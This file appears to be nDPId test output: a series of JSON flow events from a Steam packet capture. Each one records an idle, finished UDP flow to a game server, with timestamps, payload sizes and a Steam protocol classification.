-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164837,"flow_last_seen":1357332164869,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164787,"flow_last_seen":1357332164823,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 